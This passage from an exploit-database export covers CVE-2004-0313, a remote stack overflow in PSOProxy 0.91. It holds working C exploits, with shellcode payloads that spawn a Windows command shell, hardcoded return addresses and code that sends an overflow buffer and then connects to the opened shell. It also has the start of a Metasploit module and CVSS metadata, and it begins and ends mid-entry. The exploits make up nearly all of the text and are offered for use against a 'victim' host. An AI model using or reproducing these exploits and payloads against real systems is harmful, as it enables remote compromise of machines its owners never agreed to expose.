\"\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\"\r\n \"\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\"\r\n \"\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\"\r\n \"\\x34\\x72\\xa0\\x0b\\x17\\x8a\\x94\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\"\r\n \"\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\"\r\n \"\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\"\r\n \"\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\"\r\n \"\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\"\r\n \"\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\"\r\n 
\"\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\\x80\\x2f\\xa2\\x04\";\r\n\r\n\r\nWSADATA WSAData; // On initialise une variable du type WSDATA\r\nSOCKET sock; // on initialise une variable de type sock --> le socket :)\r\nSOCKADDR_IN sinf; // variable qui contien les infos teckniques du socket\r\n\r\nsystem(\"cls\"); // on efface l'<E9>cran pour faire joli\r\nintro();\r\n\r\nif(argc!=3) {\r\nprintf(\"\\nUsage : %s <ip> <port>\\n\",argv[0]);\r\nexit(-1);\r\n}\r\n\r\n\r\n_snprintf(ip, 24, \"%s\", argv[1]);\r\n\r\n\r\nWSAStartup(MAKEWORD(2,0), &WSAData); // on startup :-)\r\nsinf.sin_addr.s_addr = inet_addr(ip); // IP :)\r\nsinf.sin_family = AF_INET; // \"Famille du socket\"\r\nsinf.sin_port = htons(atoi(argv[2])); // PORT ! oooooh :>\r\nsock = socket(AF_INET,SOCK_STREAM,0); // Cr<E9>ation du socket en temps que tel\r\n\r\nbind(sock, (SOCKADDR *)&sinf, sizeof(sinf)); // On attache le socket a l'adresse et le port qu'on a d<E9>fini\r\nconnect(sock, (SOCKADDR *)&sinf, sizeof(sinf));\r\n\r\nsprintf(buffer,\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAA\\x0F\\x98\\xF8\\x77%s\\r\\n\",shellcode);// 77F8980F \\x0F\\x98\\xF8\\x77\r\n\r\nsend(sock,buffer,3000,0);\r\nprintf(\" Exploit envoye... tester le port 4444\\n\\n\");\r\nclosesocket(sock);\r\nWSACleanup();\r\n\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23732/"}, {"lastseen": "2016-02-02T21:40:58", "description": "PSOProxy 0.91 Remote Buffer Overflow Vulnerability (2). CVE-2004-0313. Remote exploit for windows platform", "published": "2004-02-20T00:00:00", "type": "exploitdb", "title": "PSOProxy 0.91 - Remote Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2004-02-20T00:00:00", "id": "EDB-ID:23733", "href": "https://www.exploit-db.com/exploits/23733/", "sourceData": "source: http://www.securityfocus.com/bid/9706/info\r\n \r\nIt has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.\r\n \r\nA malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server. 
\r\n\r\n/*\r\n * PSOProxy remote stack-based overflow\r\n * by Li0n7@voila.fr\r\n * Bug found by Donato Ferrante <fdonato@autistici.org>\r\n * Spawns cmd.exe on port 9191\r\n *\r\n * usage: ./PSOProxy-exp -h <victim> -p <port> -t <target>\r\n * Platforms supported are:\r\n * 0 - XP SP1 FR - PSOProxy 0.91 - 0x77d615b9\r\n *\r\n * $./PSOProxy-exp -h 192.168.0.1 -p 8080 -t 0\r\n * PSOProxy <= 0.91 remote exploit\r\n * Bug found by Donato Ferrante <fdonato@autistici.org>\r\n * Exploit written by Li0n7 <Li0n7@voila.fr>\r\n *\r\n * [+] Connected to 192.168.0.1:8080.\r\n * [+] Building evil string to send (0x77d615b9).\r\n * [+] Here's your shell, have fun!\r\n * Microsoft Windows XP [version 5.1.2600]\r\n * (C) Copyright 1985-2001 Microsoft Corp.\r\n *\r\n * C:\\Program Files\\psoproxy-x86-win32-0.91>\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n\r\n#define BACK 9191\r\n#define D_PORT 8080\r\n#define SIZE 2048\r\n#define JMP_ESP 0x77D4643D // USER32.DLL JMP ESP addr\r\n\r\n//ripped shellcode from ?\r\n\r\nchar shellcode[] =\r\n \"\\xEB\\x03\\x5D\\xEB\\x05\\xE8\\xF8\\xFF\\xFF\\xFF\\x8B\\xC5\\x83\\xC0\\x11\\x33\"\r\n \"\\xC9\\x66\\xB9\\xC9\\x01\\x80\\x30\\x88\\x40\\xE2\\xFA\\xDD\\x03\\x64\\x03\\x7C\"\r\n \"\\x09\\x64\\x08\\x88\\x88\\x88\\x60\\xC4\\x89\\x88\\x88\\x01\\xCE\\x74\\x77\\xFE\"\r\n \"\\x74\\xE0\\x06\\xC6\\x86\\x64\\x60\\xD9\\x89\\x88\\x88\\x01\\xCE\\x4E\\xE0\\xBB\"\r\n \"\\xBA\\x88\\x88\\xE0\\xFF\\xFB\\xBA\\xD7\\xDC\\x77\\xDE\\x4E\\x01\\xCE\\x70\\x77\"\r\n \"\\xFE\\x74\\xE0\\x25\\x51\\x8D\\x46\\x60\\xB8\\x89\\x88\\x88\\x01\\xCE\\x5A\\x77\"\r\n \"\\xFE\\x74\\xE0\\xFA\\x76\\x3B\\x9E\\x60\\xA8\\x89\\x88\\x88\\x01\\xCE\\x46\\x77\"\r\n \"\\xFE\\x74\\xE0\\x67\\x46\\x68\\xE8\\x60\\x98\\x89\\x88\\x88\\x01\\xCE\\x42\\x77\"\r\n \"\\xFE\\x70\\xE0\\x43\\x65\\x74\\xB3\\x60\\x88\\x89\\x88\\x88\\x01\\xCE\\x7C\\x77\"\r\n 
\"\\xFE\\x70\\xE0\\x51\\x81\\x7D\\x25\\x60\\x78\\x88\\x88\\x88\\x01\\xCE\\x78\\x77\"\r\n \"\\xFE\\x70\\xE0\\x2C\\x92\\xF8\\x4F\\x60\\x68\\x88\\x88\\x88\\x01\\xCE\\x64\\x77\"\r\n \"\\xFE\\x70\\xE0\\x2C\\x25\\xA6\\x61\\x60\\x58\\x88\\x88\\x88\\x01\\xCE\\x60\\x77\"\r\n \"\\xFE\\x70\\xE0\\x6D\\xC1\\x0E\\xC1\\x60\\x48\\x88\\x88\\x88\\x01\\xCE\\x6A\\x77\"\r\n \"\\xFE\\x70\\xE0\\x6F\\xF1\\x4E\\xF1\\x60\\x38\\x88\\x88\\x88\\x01\\xCE\\x5E\\xBB\"\r\n \"\\x77\\x09\\x64\\x7C\\x89\\x88\\x88\\xDC\\xE0\\x89\\x89\\x88\\x88\\x77\\xDE\\x7C\"\r\n \"\\xD8\\xD8\\xD8\\xD8\\xC8\\xD8\\xC8\\xD8\\x77\\xDE\\x78\\x03\\x50\\xDF\\xDF\\xE0\"\r\n \"\\x8A\\x88\\xAB\\x6F\\x03\\x44\\xE2\\x9E\\xD9\\xDB\\x77\\xDE\\x64\\xDF\\xDB\\x77\"\r\n \"\\xDE\\x60\\xBB\\x77\\xDF\\xD9\\xDB\\x77\\xDE\\x6A\\x03\\x58\\x01\\xCE\\x36\\xE0\"\r\n \"\\xEB\\xE5\\xEC\\x88\\x01\\xEE\\x4A\\x0B\\x4C\\x24\\x05\\xB4\\xAC\\xBB\\x48\\xBB\"\r\n \"\\x41\\x08\\x49\\x9D\\x23\\x6A\\x75\\x4E\\xCC\\xAC\\x98\\xCC\\x76\\xCC\\xAC\\xB5\"\r\n \"\\x01\\xDC\\xAC\\xC0\\x01\\xDC\\xAC\\xC4\\x01\\xDC\\xAC\\xD8\\x05\\xCC\\xAC\\x98\"\r\n \"\\xDC\\xD8\\xD9\\xD9\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\x77\\xFE\\x4A\\xD9\\x77\\xDE\"\r\n \"\\x46\\x03\\x44\\xE2\\x77\\x77\\xB9\\x77\\xDE\\x5A\\x03\\x40\\x77\\xFE\\x36\\x77\"\r\n \"\\xDE\\x5E\\x63\\x16\\x77\\xDE\\x9C\\xDE\\xEC\\x29\\xB8\\x88\\x88\\x88\\x03\\xC8\"\r\n \"\\x84\\x03\\xF8\\x94\\x25\\x03\\xC8\\x80\\xD6\\x4A\\x8C\\x88\\xDB\\xDD\\xDE\\xDF\"\r\n \"\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\\xF0\\x8B\\x5D\\x03\\xC2\\x90\"\r\n \"\\x03\\xD2\\xA8\\x8B\\x55\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x8B\\x7D\\xBB\\x77\\x74\"\r\n \"\\xBB\\x48\\x24\\xB2\\x4C\\xFC\\x8F\\x49\\x47\\x85\\x8B\\x70\\x63\\x7A\\xB3\\xF4\"\r\n \"\\xAC\\x9C\\xFD\\x69\\x03\\xD2\\xAC\\x8B\\x55\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\"\r\n \"\\x8B\\x55\\x03\\x8C\\x03\\x8B\\x4D\\x63\\x8A\\xBB\\x48\\x03\\x5D\\xD7\\xD6\\xD5\"\r\n \"\\xD3\\x4A\\x8C\\x88\";\r\n\r\nstruct os_ret_addr\r\n{\r\n int num;\r\n char *plat;\r\n long ret;\r\n};\r\n\r\nstruct 
os_ret_addr exp_os[]=\r\n{\r\n{0,\"XP SP1 FR - PSOProxy 0.91\", 0x77D615B9}, // USER32.DLL jmp esp addr\r\n{0,NULL,0},\r\n};\r\n\r\nchar *build(long ret);\r\nint back_connection(long host);\r\nvoid send_evil(int fd,char evil[]);\r\nint set_connection(long host,int port);\r\nlong resolve_host(u_char *host_name);\r\nvoid die(char *argv);\r\n\r\nint\r\nmain(int argc,char *argv[])\r\n{\r\n int i, option, fd, port = D_PORT;\r\n long host = 0, ret = JMP_ESP;\r\n char * option_list = \"h:p:t:\", buffer[SIZE];\r\n\r\n opterr = 0;\r\n\r\n fprintf(stdout,\"PSOProxy <= 0.91 remote exploit\\r\\n\");\r\n fprintf(stdout,\"Bug found by Donato Ferrante <fdonato@autistici.org>\\r\\n\");\r\n fprintf(stdout,\"Exploit written by Li0n7 <Li0n7@voila.fr>\\r\\n\\n\");\r\n\r\n if (argc < 2) die(argv[0]);\r\n\r\n while((option = getopt(argc,argv,option_list)) != -1)\r\n switch(option)\r\n {\r\n case 'h':\r\n host = resolve_host(optarg);\r\n if(!host)\r\n {\r\n fprintf(stderr,\"[-] Host address incorrect.\\n\");\r\n exit(0);\r\n }\r\n break;\r\n case 'p':\r\n port = atoi(optarg);\r\n if(port > 65535 || port < 0) exit(1);\r\n break;\r\n case 't':\r\n for(i=0; exp_os[i].plat != NULL; i++)\r\n if(atoi(optarg) > i || atoi(optarg) < 0)\r\n {\r\n fprintf(stderr,\"Platforms supported are:\\n\");\r\n for(i=0; exp_os[i].plat != NULL; i++)\r\n fprintf(stderr,\"\\t%i - %s - 0x%x\\n\",i,exp_os[i].plat,exp_os[i].ret);\r\n exit(1);\r\n }\r\n ret = exp_os[atoi(optarg)].ret;\r\n break;\r\n case '?':\r\n fprintf(stderr,\"[-] option \\'%c\\' unknown\\n\",optopt);\r\n die(argv[0]);\r\n }\r\n\r\n fd = set_connection(host,port);\r\n strncpy(buffer,build(ret),SIZE-1);\r\n buffer[SIZE-1] = '\\0';\r\n send_evil(fd,buffer);\r\n back_connection(host);\r\n return 0;\r\n}\r\n\r\nchar\r\n*build(long ret)\r\n{\r\n char *buffer,*ptr,*request;\r\n int i;\r\n long *addr_ptr;\r\n\r\n fprintf(stdout,\"[+] Building evil string to send (0x%x).\\n\",ret);\r\n buffer = (char *)malloc(SIZE);\r\n request = (char 
*)malloc(SIZE+4);\r\n\r\n if(!buffer || !request)\r\n {\r\n fprintf(stderr,\"[-] Can't allocate memory, exiting...\\n\");\r\n exit(0);\r\n }\r\n\r\n ptr = buffer;\r\n memset(ptr,0x41,1024);\r\n ptr += 1024;\r\n\r\n addr_ptr = (long *)ptr;\r\n *(addr_ptr++) = ret;\r\n ptr = (char *)addr_ptr;\r\n\r\n memset(ptr,0x90,20);\r\n ptr += 20;\r\n memcpy(ptr,shellcode,strlen(shellcode));\r\n ptr += strlen(shellcode);\r\n\r\n snprintf(request,SIZE+64,\"%s\\r\\n\",buffer);\r\n return request;\r\n}\r\n\r\n\r\nint\r\nback_connection(long host)\r\n{\r\n struct sockaddr_in s;\r\n u_char sock_buf[4096];\r\n fd_set fds;\r\n int fd,size;\r\n char *command=\"ver\\n\";\r\n\r\n fd = socket(AF_INET, SOCK_STREAM, 0);\r\n if (fd < 0)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n exit(0);\r\n }\r\n\r\n s.sin_family = AF_INET;\r\n s.sin_port = htons(BACK);\r\n s.sin_addr.s_addr = host;\r\n\r\n if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) == -1)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n return 0;\r\n }\r\n\r\n fprintf(stdout, \"[+] Here's your shell, have fun!\\n\\n\");\r\n\r\n size = send(fd, command, strlen(command), 0);\r\n if(size < 0)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n exit(0);\r\n }\r\n\r\n for (;;)\r\n {\r\n FD_ZERO(&fds);\r\n FD_SET(0, &fds);\r\n FD_SET(fd, &fds);\r\n\r\n if (select(255, &fds, NULL, NULL, NULL) == -1)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n exit(0);\r\n }\r\n\r\n memset(sock_buf, 0, sizeof(sock_buf));\r\n\r\n if (FD_ISSET(fd, &fds))\r\n {\r\n if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)\r\n {\r\n fprintf(stderr, \"[-] Connection closed by remote host.\\n\");\r\n close(fd);\r\n exit(0);\r\n }\r\n\r\n fprintf(stderr, \"%s\", sock_buf);\r\n }\r\n\r\n if (FD_ISSET(0, &fds))\r\n {\r\n read(0, sock_buf, sizeof(sock_buf));\r\n write(fd, sock_buf, strlen(sock_buf));\r\n }\r\n }\r\n return 0;\r\n}\r\n\r\nvoid\r\nsend_evil(int 
fd,char evil[SIZE+64])\r\n{\r\n int size;\r\n size = send(fd, evil, strlen(evil), 0);\r\n if(size < 0)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n exit(0);\r\n }\r\n sleep(1);\r\n return;\r\n}\r\n\r\n\r\nint\r\nset_connection(long host,int port)\r\n{\r\n struct sockaddr_in s;\r\n struct hostent * hoste;\r\n int fd,size;\r\n\r\n fd = socket(AF_INET,SOCK_STREAM,0);\r\n if(fd < 0)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n exit(0);\r\n }\r\n\r\n s.sin_family = AF_INET;\r\n s.sin_addr.s_addr = host;\r\n s.sin_port = htons(port);\r\n\r\n if(connect(fd,(struct sockaddr *)&s,sizeof(s)) == -1)\r\n {\r\n fprintf(stderr,\"[-] %s\\n\",strerror(errno));\r\n close(fd);\r\n exit(0);\r\n }\r\n\r\n fprintf(stdout,\"[+] Connected to %s:%i.\\n\",inet_ntoa(s.sin_addr.s_addr),port);\r\n\r\n sleep(1);\r\n return fd;\r\n\r\n}\r\n\r\nlong resolve_host(u_char *host_name)\r\n{\r\n struct in_addr addr;\r\n struct hostent *host_ent;\r\n\r\n addr.s_addr = inet_addr(host_name);\r\n if (addr.s_addr == -1)\r\n {\r\n host_ent = gethostbyname(host_name);\r\n if (!host_ent) return(0);\r\n memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);\r\n }\r\n\r\n return(addr.s_addr);\r\n}\r\n\r\nvoid\r\ndie(char *argv)\r\n{\r\n int i;\r\n fprintf(stdout,\"usage: %s -h <victim> -p <port> -t <target>\\n\",argv);\r\n fprintf(stderr,\"Platforms supported are:\\n\");\r\n for(i=0; exp_os[i].plat != NULL; i++)\r\n fprintf(stderr,\"\\t%i - %s - 0x%x\\n\",i,exp_os[i].plat,exp_os[i].ret);\r\n exit(1);\r\n}\r\n\r\n/* A poil! */\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23733/"}, {"lastseen": "2016-02-02T21:41:07", "description": "PSOProxy 0.91 Remote Buffer Overflow Vulnerability (3). CVE-2004-0313. 
Remote exploit for windows platform", "published": "2004-02-20T00:00:00", "type": "exploitdb", "title": "PSOProxy 0.91 - Remote Buffer Overflow Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2004-02-20T00:00:00", "id": "EDB-ID:23734", "href": "https://www.exploit-db.com/exploits/23734/", "sourceData": "source: http://www.securityfocus.com/bid/9706/info\r\n \r\nIt has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.\r\n \r\nA malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server. \r\n\r\n/*******************************************************\r\n* PSO v0.91 Remote exploit *\r\n* by NoRpiUs *\r\n* *\r\n* web: www.norpius.tk *\r\n* email: norpius@altervista.org *\r\n* *\r\n*******************************************************/ \r\n\r\n#include <stdio.h>\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include <windows.h>\r\n #define close closesocket\r\n#else\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\nunsigned char shellcode[] = \r\n\r\n \"\\xeb\\x43\\x56\\x57\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\\x52\\x8b\\x52\"\r\n \"\\x20\\x01\\xea\\x31\\xc0\\x31\\xc9\\x41\\x8b\\x34\\x8a\\x01\\xee\\x31\\xff\\xc1\"\r\n \"\\xcf\\x13\\xac\\x01\\xc7\\x85\\xc0\\x75\\xf6\\x39\\xdf\\x75\\xea\\x5a\\x8b\\x5a\"\r\n \"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\"\r\n \"\\xe8\\x5f\\x5e\\xff\\xe0\\xfc\\x31\\xc0\\x64\\x8b\\x40\\x30\\x8b\\x40\\x0c\\x8b\"\r\n \"\\x70\\x1c\\xad\\x8b\\x68\\x08\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x68\\x33\\x32\"\r\n \"\\x2e\\x64\\x68\\x77\\x73\\x32\\x5f\\x54\\xbb\\x71\\xa7\\xe8\\xfe\\xe8\\x90\\xff\"\r\n 
\"\\xff\\xff\\x89\\xef\\x89\\xc5\\x81\\xc4\\x70\\xfe\\xff\\xff\\x54\\x31\\xc0\\xfe\"\r\n \"\\xc4\\x40\\x50\\xbb\\x22\\x7d\\xab\\x7d\\xe8\\x75\\xff\\xff\\xff\\x31\\xc0\\x50\"\r\n \"\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xbb\\xa6\\x55\\x34\\x79\\xe8\\x61\\xff\\xff\"\r\n \"\\xff\\x89\\xc6\\x31\\xc0\\x50\\x50\\x35\\x02\\x01\\x70\\xcc\\xfe\\xcc\\x50\\x89\"\r\n \"\\xe0\\x50\\x6a\\x10\\x50\\x56\\xbb\\x81\\xb4\\x2c\\xbe\\xe8\\x42\\xff\\xff\\xff\"\r\n \"\\x31\\xc0\\x50\\x56\\xbb\\xd3\\xfa\\x58\\x9b\\xe8\\x34\\xff\\xff\\xff\\x58\\x60\"\r\n \"\\x6a\\x10\\x54\\x50\\x56\\xbb\\x47\\xf3\\x56\\xc6\\xe8\\x23\\xff\\xff\\xff\\x89\"\r\n \"\\xc6\\x31\\xdb\\x53\\x68\\x2e\\x63\\x6d\\x64\\x89\\xe1\\x41\\x31\\xdb\\x56\\x56\"\r\n \"\\x56\\x53\\x53\\x31\\xc0\\xfe\\xc4\\x40\\x50\\x53\\x53\\x53\\x53\\x53\\x53\\x53\"\r\n \"\\x53\\x53\\x53\\x6a\\x44\\x89\\xe0\\x53\\x53\\x53\\x53\\x54\\x50\\x53\\x53\\x53\"\r\n \"\\x43\\x53\\x4b\\x53\\x53\\x51\\x53\\x87\\xfd\\xbb\\x21\\xd0\\x05\\xd0\\xe8\\xdf\"\r\n \"\\xfe\\xff\\xff\\x5b\\x31\\xc0\\x48\\x50\\x53\\xbb\\x43\\xcb\\x8d\\x5f\\xe8\\xcf\"\r\n \"\\xfe\\xff\\xff\\x56\\x87\\xef\\xbb\\x12\\x6b\\x6d\\xd0\\xe8\\xc2\\xfe\\xff\\xff\"\r\n \"\\x83\\xc4\\x5c\\x61\\xeb\\x89\\x41\\r\\n\";\r\n\r\n\r\nvoid errore( char *err )\r\n{\r\n\tprintf(\"%s\",err);\r\n\texit(1);\r\n}\r\n\r\nvoid connectz( char *host)\r\n{\r\n\tchar comando[30000];\r\n\tsleep(5000);\r\n\tsprintf(comando, \"telnet %s 28876\", host);\r\n\tsystem(comando);\r\n}\r\n\r\nvoid banner(void)\r\n{\r\n\tfputs(\"\\n\\tPSO Remote exploit\\n\"\r\n\t \"\\tBy NoRpiUs\\n\"\r\n\t \"\\tweb: www.norpius.tk\\n\"\r\n\t \"\\temail: norpius@altervista.org\\n\\n\", stdout);\r\n}\r\n\r\nvoid uso( char *progz )\r\n{\t\r\n\tprintf(\"Uso: <host> <porta> <target>\\n\\n\");\r\n\tprintf(\"\\tTarget: \\n\"\r\n \"\\t1 = Win2k ITA SP4 \\n\"\r\n \"\\t2 = WinXP ITA SP0(1)\\n\"\r\n \"\\t3 = WinXP ITA SP0(2)\\n\");\r\n\texit(1);\r\n}\r\n\r\nint main( int argc, char *argv[] )\r\n{\r\n\tint sock;\r\n\tstruct hostent *he;\r\n\tstruct 
sockaddr_in target;\r\n\tunsigned char evilbuff[1530];\r\n\tlong retaddr1 = 0x796C7DDC; \r\n long retaddr2 = 0x77E7FC79; \r\n long retaddr3 = 0x77EB1933; \r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(2,0), &wsadata);\r\n#endif\r\n\r\n\tbanner();\r\n\tif ( argc < 4 ) uso(argv[0]);\r\n\r\n\tif ( (he = gethostbyname(argv[1])) == NULL )\r\n\t\terrore(\"\\t[-] Impossibile risolvere l'host\\n\");\r\n\r\n\ttarget.sin_family = AF_INET;\r\n\ttarget.sin_addr = *(( struct in_addr *) he -> h_addr );\r\n\ttarget.sin_port = htons(atoi(argv[2]));\r\n\r\n\tfputs(\"\\t[+] Preparazione del buffer...\\n\", stdout);\r\n\r\n\tmemset(evilbuff, 0x41, 1040 );\r\n\t\r\n switch(argv[3][0]) \r\n {\r\n case '1': memcpy(evilbuff + 1024, (unsigned char *) &retaddr1, 4); break;\r\n case '2': memcpy(evilbuff + 1024, (unsigned char *) &retaddr2, 4); break;\r\n case '3': memcpy(evilbuff + 1024, (unsigned char *) &retaddr3, 4); break;\r\n default : errore(\"[-] Target sbagliato\\n\"); \r\n }\r\n\t\r\n\tmemcpy(evilbuff + 1040, shellcode, sizeof(shellcode)); \r\n\t\r\n\tfputs(\"\\t[+] Connessione...\\n\", stdout);\r\n\r\n\tif ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0 )\r\n\t\terrore(\"\\t[-] Impossibile creare socket\\n\");\r\n\r\n\tif ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 )\r\n\t\terrore(\"\\t[-] Connessione fallita\\n\");\r\n\r\n\tif ( send( sock, evilbuff, sizeof(evilbuff), 0) < 0 )\r\n\t\terrore(\"\\t[-] Impossibile spedire il buffer\\n\");\r\n\r\n\tclose(sock);\r\n\r\n\tfputs(\"\\t[+] Buffer spedito!\\n\", stdout);\r\n\tfputs(\"\\t[+] In attesa della connessione...\\n\\n\", stdout);\r\n\r\n\tconnectz(argv[1]);\r\n\r\n\treturn(0);\r\n\r\n}\r\n\r\n\t\r\n\t\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23734/"}, {"lastseen": "2016-02-02T06:30:53", "description": "PSO Proxy v0.91 Stack Buffer Overflow. CVE-2004-0313. 
Dos exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "PSO Proxy 0.91 - Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16790", "href": "https://www.exploit-db.com/exploits/16790/", "sourceData": "##\r\n# $Id: psoproxy91_overflow.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'PSO Proxy v0.91 Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a buffer overflow in the PSO Proxy v0.91 web server.\r\n\t\t\t\tIf a client sends an excessively long string the stack is overwritten.\r\n\t\t\t},\r\n\t\t\t'Author' => 'Patrick Webster <patrick@aushack.com>',\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2004-0313' ],\r\n\t\t\t\t\t[ 'OSVDB', '4028' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/156' ],\r\n\t\t\t\t\t[ 'BID', '9706' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 370,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t# Patrick - Tested OK 